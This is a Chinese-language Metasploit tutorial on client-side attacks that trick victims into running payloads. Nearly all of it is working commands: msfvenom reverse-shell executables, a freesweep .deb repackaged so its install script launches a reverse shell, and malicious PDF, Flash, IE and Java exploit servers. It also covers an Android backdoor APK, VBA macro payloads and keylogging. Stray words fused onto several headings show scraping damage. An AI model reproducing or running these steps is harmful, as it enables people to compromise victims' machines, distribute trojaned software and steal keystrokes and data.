1. 簡介
-
在沒法突破網絡邊界的狀況下轉而攻擊客戶端java
- 社會工程學攻擊
- 進而滲透線上業務網絡
-
含有漏洞利用代碼的 web 站點linux
- 利用客戶端漏洞
-
含有漏洞利用代碼的 doc、pdf等文檔android
- 誘騙被害者執行 payload
2. 攻擊 windows
-
誘騙被害者執行 payload (windows)web
- msfvenom –payload-options -p windows/shell/reverse_tcp
-
msfvenom -a x86 –platform windows -p windows/shell/reverse_tcp LHOST=10.10.10.131 LPORT=4444 -b 「\x00」 -e x86/shikata_ga_nai -f exe -o 1.exeshell
root@kali:~# msfvenom --payload-options -p windows/shell/reverse_tcp root@kali:~# msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=10.10.10.147 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -f exe -o 1.exe # 將文件拷貝到 winxp 主機
-
msfconsoleubuntu
- use exploit/multi/handler
- set payload windows/shell/reverse_tcp
- set LHOST 10.10.10.131
- set LPORT 4444
- exploit
-
客戶端執行文件vim
msf exploit(multi/handler) > set payload windows/shell/reverse_tcp msf exploit(multi/handler) > set LHOST 10.10.10.131 msf exploit(multi/handler) > set LPORT 4444 msf exploit(multi/handler) > exploit
3. 攻擊 linux
- 誘騙被害者執行 payload (linux deb 安裝包)
- cd /var/cache/apt/archives
- dpkg -x freesweep_0.90-3+b1_amd64.deb
- mkdir free/DEBIAN && cd free/DEBIAN
-
vi controlwindows
Package: freesweep Version: 0.90-3 Section: Games and Amusement Priority: optional Architecture:i386_64 Maintainer: Ubuntu MOTU Developers (ubuntu-motu@ lists.ubuntu.com) Description: a text-based minesweeper Freesweep isan implementation of the popular minesweeper game,whereone tries to find all the mines without igniting any, based on hints givenby the computer.Unlike most implementations of this game,Freesweepworksinanyvisualtextdispl in Linuxconsole,inanxterm,and inmost text-based terminals currently in use.
-
vim postinst瀏覽器
#!/bin/sh sudo chmod 2755 /usr/games/freesweep_scores && /usr/games/freesweep_scores & /usr/games/freesweep &
-
msfvenom -a x86 –platform linux -p linux/x86/shell/reverse_tcp LHOST=1.1.1.1 LPORT=4444 -b 「\x00」 -f elf -o /root/free/usr/games/freesweep_scores安全
- chmod 755 postinst
-
dpkg-deb –build /root/free
root@kali:~# apt-get --download-only install freesweep root@kali:~# cd /var/cache/apt/archives/ root@kali:~# cp freesweep_0.90-3+b1_amd64.deb ~ root@kali:~# cd root@kali:~# dpkg -x freesweep_0.90-3+b1_amd64.deb free root@kali:~# cd free root@kali:~/free# mkdir debian root@kali:~/free# cd DEBIAN/ root@kali:~/free/DEBIAN# vim control Package: freesweep Version: 0.90-3 Section: Games and Amusement Priority: optional Architecture:amd64 Maintainer: Ubuntu MOTU Developers (ubuntu-motu@ lists.ubuntu.com) Description: a text-based minesweeper Freesweep isan implementation of the popular minesweeper game,whereone tries to find all the mines without igniting any, based on hints givenby the computer.Unlike most implementations of this game,Freesweepworksinanyvisualtextdispl in Linuxconsole,inanxterm,and inmost text-based terminals currently in use. root@kali:~/free/DEBIAN# vim postinst #!/bin/sh sudo chmod 2755 /usr/games/freesweep_scores && /usr/games/freesweep_scores & /usr/games/freesweep & root@kali:~/free# chmod 755 postinst # 生成 payload root@kali:~/free/DEBIANn# msfvenom -a x86 --platform linux -p linux/x86/shell/reverse_tcp LHOST=10.10.10.131 LPORT=4444 -b "\x00" -f elf -o /root/free/usr/games/freesweep_scores root@kali:~/free/DEBIAN# dpkg-deb --build /root/free # 受害者機器安裝此軟件 root@lamp:/home/kevin/Desktop# dpkg -i free.deb
4. 利用 Acrobat Reader 漏洞執行 payload
-
構造 pdf 文件:use exploit/windows/fileformat/adobe_utilprintf
# 構造 pdf 文件 use exploit/windows/fileformat/adobe_utilprintf set payload windows/meterpreter/reverse_tcp msf exploit(windows/fileformat/adobe_utilprintf) > run [+] msf.pdf stored at /root/.msf4/local/msf.pdf # 開啓監聽 use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 10.10.10.131 exploit -
構造惡意網站:use exploit/windows/browser/adobe_utilprintf
use exploit/windows/browser/adobe_utilprintf set SRVPORT 80 set URIPATH / set payload windows/meterpreter/reverse_tcp set LHOST 10.10.10.131 exploit
-
Meterpreter
- use priv
- run post/windows/capture/keylog_recorder
5. 利用 flash 插件漏洞執行 paylaod
-
use exploit/multi/browser/adobe_flash_hacking_team_uaf
use exploit/multi/browser/adobe_flash_hacking_team_uaf set SRVPORT 80 set URIPATH / set payload windows/meterpreter/reverse_tcp set LHOST 10.10.10.131 exploit
-
use exploit/multi/browser/adobe_flash_opaque_background_uaf
use exploit/multi/browser/adobe_flash_opaque_background_uaf set SRVPORT 80 set URIPATH / set payload windows/meterpreter/reverse_tcp set LHOST 10.10.10.131 exploit
-
use auxiliary/server/browser_autopwn2
use auxiliary/server/browser_autopwn2 set SRVPORT 80 set URIPATH / exploit
6. 利用 IE 瀏覽器漏洞執行 payload
-
use exploit/windows/browser/ms14_064_ole_code_execution
use exploit/windows/browser/ms14_064_ole_code_execution set SRVPORT 80 set URIPATH / set payload windows/meterpreter/reverse_tcp set LHOST 10.10.10.131 exploit
7. 利用 JRE 漏洞執行 payload
-
use exploit/multi/browser/java_jre17_driver_manager
use exploit/multi/browser/java_jre17_driver_manager set SRVPORT 80 set SRVHOST 10.10.10.131 set URIPATH / set payload java/meterpreter/reverse_tcp set LHOST 10.10.10.131 exploit
-
use exploit/multi/browser/java_jre17_jmxbean
use exploit/multi/browser/java_jre17_jmxbean set SRVPORT 80 set SRVHOST 10.10.10.131 set URIPATH / set payload java/meterpreter/reverse_tcp set LHOST 10.10.10.131 exploit
-
use exploit/multi/browser/java_jre17_reflection_types
use exploit/multi/browser/java_jre17_reflection_types set SRVPORT 80 set SRVHOST 10.10.10.131 set URIPATH / set payload java/meterpreter/reverse_tcp set LHOST 10.10.10.131 exploit
8. 生成 android 後門程序
- use payload/android/meterpreter/reverse_tcp
- generate -f a.apk -p android -t raw
9. 宏感染
- 利用宏感染 word、except 文檔
- 繞過某些基於文件類型檢查的安全機制
-
生成 vbscript 腳本:msfvenom -a x86 –platform windows -p windows/meterpreter/reverse_tcp LHOST=10.10.10.131 LPORT=4444 -e x86/shikata_ga_nai -f vba-exe
-
office 2007 +
- payload 第一部分粘入 VBA 代碼
-
payload 第二部分粘入 word 正文
-
msf 啓動偵聽
- use exploit/multi/handler
- set payload windows/meterpreter/reverse_tcp